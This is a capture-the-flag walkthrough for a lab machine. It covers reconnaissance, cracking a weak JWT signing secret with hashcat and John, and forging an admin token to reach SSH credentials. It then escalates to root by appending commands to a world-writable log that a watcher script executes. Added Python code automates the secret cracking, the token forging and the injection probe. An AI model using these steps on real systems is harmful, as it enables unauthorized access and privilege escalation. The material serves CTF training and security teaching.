CyberSec Corp's new vulnerability management platform claims to have enterprise-grade security measures in place. They're confident in their defenses and believe their system is impenetrable. 🛡️ Your mission: conduct a comprehensive security assessment and see if their confidence is justified!
Start by exploring the target application to understand the attack surface using comprehensive reconnaissance tools:
# Full TCP port sweep (all 65535 ports; running -sC/-sV against every port is slow, so scripts and version probes go against the discovered ports in the next step)
nmap -p- <target-ip>
# Service and script enumeration on the discovered ports
nmap -sC -sV -p 22,80 <target-ip>
# Expected results:
# 22/tcp open ssh OpenSSH
# 80/tcp open http Werkzeug/Flask
# Directory enumeration
gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt
# Technology detection
whatweb http://<target-ip>
# Manual exploration
curl -I http://<target-ip>
Navigate to http://<target-ip> and explore available functionality: login (/login), signup (/signup), dashboard (/dashboard), and admin (/admin) endpoints.
The application uses JWT tokens for authentication. Create a user account and analyze the JWT structure:
# Register new user
curl -X POST http://<target-ip>/signup \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=testuser&password=testpass123" \
-c cookies.txt
# Login to get JWT token
curl -X POST http://<target-ip>/login \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=testuser&password=testpass123" \
-c cookies.txt -L
# Extract JWT from cookies
grep jwt cookies.txt
# Or using browser dev tools:
# F12 → Application → Cookies → jwt
# Decode JWT structure at jwt.io
# Or using the command line. The payload is the second dot-separated segment; JWTs use
# unpadded base64url, so translate the alphabet and restore padding before base64 -d
PAYLOAD=$(echo "JWT_TOKEN_HERE" | cut -d. -f2 | tr '_-' '/+')
while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD="${PAYLOAD}="; done
echo "$PAYLOAD" | base64 -d; echo
Discover the JWT secret through various attack methods:
# Save JWT to file
echo "JWT_TOKEN" > jwt.txt
# Brute force with hashcat
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
# Common secrets wordlist
hashcat -a 0 -m 16500 jwt.txt /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
# Convert JWT for John
python3 /usr/share/john/jwt2john.py JWT_TOKEN > jwt.hash
# Crack with John
john jwt.hash --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked password
john --show jwt.hash
# Manually testing common secrets also works here:
# secret, key, password, admin, 123456, secret123, !!!secret!!!
# The secret this application signs with is: !!!secret!!!
# Either the wordlist run or systematic manual testing recovers it
Create a forged JWT token with admin privileges using the discovered secret:
# Install PyJWT if needed
pip3 install PyJWT
# Create forged admin token
python3 -c "
import datetime
import jwt  # PyJWT

# Claim names (username, role) mirror those seen in the decoded legitimate token
payload = {
    'username': 'admin',
    'role': 'admin',
    'exp': int((datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=24)).timestamp())
}
# Same algorithm (HS256) plus the recovered secret yields a signature the server accepts
token = jwt.encode(payload, '!!!secret!!!', algorithm='HS256')
print('Forged JWT:', token)
"
# Using jwt.io:
# 1. Paste original JWT in Encoded section
# 2. Modify payload:
# "username": "admin"
# "role": "admin"
# 3. Enter secret: !!!secret!!!
# 4. Copy the new encoded JWT
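The following Python is added here and is not code from the original walkthrough or from the target application. It performs both JWT steps with the standard library alone so the mechanics that hashcat and PyJWT hide are visible: recovering an HS256 secret from a candidate list the way hashcat -m 16500 does (recompute the HMAC for each candidate and compare it with the token's signature), then re-signing an escalated payload and confirming a server-style verification accepts it. The claim names and the secret !!!secret!!! come from the walkthrough; SAMPLE_TOKEN and CANDIDATES are constructed inside the block, not captured from the target.

```python
"""Added example (not from the walkthrough): HS256 secret recovery and token
forging with only the standard library. SAMPLE_TOKEN and CANDIDATES are
constructed stand-ins; the claim names and secret follow the walkthrough."""
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(data: bytes) -> str:
    # JWT segments are base64url with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding first; plain decoders reject unpadded input
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_decode_unverified(token: str):
    """Return (header, payload) without checking the signature, as jwt.io does."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def jwt_sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Build header.payload.signature; the MAC covers the first two encoded segments."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode()) for part in (header, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def crack_hs256_secret(token: str, candidates):
    """Offline brute force: recompute the MAC per candidate and compare with the
    token's signature. Returns the matching secret or None (what hashcat -m 16500 does)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"expected HS256, token uses {header.get('alg')!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for candidate in candidates:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def forge_admin_token(original_token: str, secret: str, lifetime_s: int = 86400) -> str:
    """Keep the original header and any extra claims; escalate username/role, refresh exp."""
    header, payload = jwt_decode_unverified(original_token)
    forged = dict(payload, username="admin", role="admin", exp=int(time.time()) + lifetime_s)
    return jwt_sign_hs256(header, forged, secret)


def verify_hs256(token: str, secret: str):
    """Server-side check: recompute and compare in constant time; payload only on a match."""
    head, body, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))


# Constructed stand-in for the token /login would set (not a real capture)
ISSUER_SECRET = "!!!secret!!!"
SAMPLE_TOKEN = jwt_sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"username": "testuser", "role": "user", "exp": 2000000000},
    ISSUER_SECRET,
)
# Constructed mini wordlist in the spirit of the common-secrets list above
CANDIDATES = ["secret", "key", "password", "admin", "123456", "secret123", "!!!secret!!!"]

if __name__ == "__main__":
    print("payload:", jwt_decode_unverified(SAMPLE_TOKEN)[1])
    recovered = crack_hs256_secret(SAMPLE_TOKEN, CANDIDATES)
    print("recovered secret:", recovered)
    forged = forge_admin_token(SAMPLE_TOKEN, recovered)
    print("forged token:", forged)
    print("server accepts forged token as:", verify_hs256(forged, ISSUER_SECRET))
```

To use it against the real target, replace SAMPLE_TOKEN with the value of the jwt cookie and pass an iterator over a wordlist file as CANDIDATES. The alg check matters: a token signed with another algorithm needs a different attack, and a secret that survives the wordlist needs the hashcat run above rather than a Python loop.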
Use the forged JWT token to access the admin panel and discover SSH credentials:
# Using browser dev tools:
# 1. F12 → Application → Cookies
# 2. Replace jwt cookie value with forged token
# 3. Navigate to http://<target-ip>/admin
# 4. Observe SSH credentials displayed
# Access admin panel with forged JWT (send it as the jwt cookie, follow redirects)
curl -s -L -b "jwt=FORGED_JWT_TOKEN_HERE" http://<target-ip>/admin
# Extract credentials from response:
# Username: ctf
# Password: gzCxliaIr26MDS3ppbRSnCrNgOcR5ppM
Use the discovered credentials to gain SSH access and retrieve the first flag:
# Connect via SSH
ssh ctf@<target-ip>
# Password: gzCxliaIr26MDS3ppbRSnCrNgOcR5ppM
# Alternative with sshpass
sshpass -p 'gzCxliaIr26MDS3ppbRSnCrNgOcR5ppM' ssh ctf@<target-ip>
Once logged in via SSH, retrieve the user flag:
# Retrieve the first flag
ls -la
cat flag-user.txt
# Expected output: First flag obtained!
# This completes the user-level compromise
# Basic system information
whoami
id
uname -a
cat /etc/os-release
# Process enumeration
ps aux
ps aux | grep -v "\["
# File system exploration
ls -la /
ls -la /var/log/
find / -writable 2>/dev/null | head -20
Discover the log watcher script and identify the log injection vulnerability:
# Check running processes
ps aux | grep -i log
ps aux | grep -i watch
ps aux | grep -i bash
# Look for suspicious scripts
find /usr/local/bin -name "*log*" 2>/dev/null
find /usr/local/bin -type f -executable 2>/dev/null
# Examine log watcher script
cat /usr/local/bin/log_watcher.sh
# Examine log directory
ls -la /var/log/
ls -la /var/log/custom.log
# Check file permissions (critical!) - the escalation depends on ctf being able to write to the log
stat -c '%A %U %G' /var/log/custom.log
ls -l /var/log/custom.log
# Expected mode: -rw-rw-rw- (world writable)
# Test write access
echo "test" >> /var/log/custom.log
tail /var/log/custom.log
Exploit the log watcher script that executes commands from the log file to escalate privileges and obtain the root flag:
# Test command execution
echo "whoami > /tmp/test1.txt" >> /var/log/custom.log
echo "id > /tmp/test2.txt" >> /var/log/custom.log
echo "date > /tmp/test3.txt" >> /var/log/custom.log
# Wait 30-60 seconds for execution
sleep 60
# Check if commands executed
ls -la /tmp/test*.txt
cat /tmp/test1.txt
cat /tmp/test2.txt
Copy root flag to accessible location:
# Copy root flag to accessible location
echo "cp /root/flag-root.txt /tmp/root-flag.txt" >> /var/log/custom.log
echo "chmod 644 /tmp/root-flag.txt" >> /var/log/custom.log
echo "chown ctf:ctf /tmp/root-flag.txt" >> /var/log/custom.log
# Wait for execution (30 second intervals)
sleep 60
# Retrieve root flag - MISSION COMPLETE!
cat /tmp/root-flag.txt
# Expected output: Second flag obtained!
# This completes the root-level compromise
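The Python below is an added example, not part of the original walkthrough or the target system. It packages the pre-flight checks a practitioner would run before relying on the log-injection step: confirm the log is actually world-writable, inject a probe and poll for its marker file instead of sleeping a fixed 60 seconds, and confirm from the probe's id output that the watcher runs as uid 0 before touching /root. The path /var/log/custom.log and the watcher's behaviour (each appended line is executed as a shell command on a roughly 30 second cycle) are taken from the walkthrough; the marker-file convention and the /tmp/.lw_probe name are this example's own.

```python
"""Added example (not from the walkthrough): pre-flight checks for the
log-injection privilege escalation. /var/log/custom.log and the watcher's
line-executes-as-command behaviour are the walkthrough's; the marker protocol
and probe path are assumptions of this example."""
import os
import re
import stat
import time

LOG_FILE = "/var/log/custom.log"  # target log from the walkthrough
PROBE_MARKER = "/tmp/.lw_probe"   # assumed scratch path for the probe's output


def is_world_writable(path: str) -> bool:
    """True if 'other' has the write bit (e.g. mode 0666), the condition the privesc needs."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def inject_and_wait(log_path: str, command: str, marker: str, timeout: float = 90.0, poll: float = 1.0):
    """Append `command` (which must write its result to `marker`) to the log, then
    poll for the marker rather than sleeping blindly. Returns the marker's contents,
    or None if the watcher did not run the command within `timeout` seconds."""
    with open(log_path, "a") as fh:
        fh.write(command + "\n")
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if os.path.exists(marker):
            with open(marker) as fh:
                return fh.read()
        time.sleep(poll)
    return None


UID_RE = re.compile(r"uid=(\d+)")


def parse_uid(id_output):
    """Numeric uid from `id` output, or None if it is absent (probe never ran)."""
    match = UID_RE.search(id_output or "")
    return int(match.group(1)) if match else None


def confirm_root_execution(log_path: str = LOG_FILE, marker: str = PROBE_MARKER, timeout: float = 90.0) -> bool:
    """Full pre-flight: refuse unless the log is world-writable, then prove the
    watcher executes injected lines as uid 0 before going after /root/flag-root.txt."""
    if not is_world_writable(log_path):
        raise PermissionError(f"{log_path} is not world-writable; log injection will not work")
    output = inject_and_wait(log_path, f"id > {marker}", marker, timeout)
    return parse_uid(output) == 0


if __name__ == "__main__":
    if confirm_root_execution():
        print("watcher runs as root; safe to inject the cp/chmod lines")
    else:
        print("probe did not run as root (or did not run at all); re-check the watcher")
```

If confirm_root_execution returns False, the watcher either is not running, is running as an unprivileged user, or uses a longer cycle than the 90 second default; check ps output before injecting anything else, since every failed line stays in the log.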
Attack Chain Summary:
Both flags have been successfully retrieved:
/home/ctf/flag-user.txt - Retrieved via SSH access after JWT manipulation
/root/flag-root.txt - Retrieved via log injection privilege escalation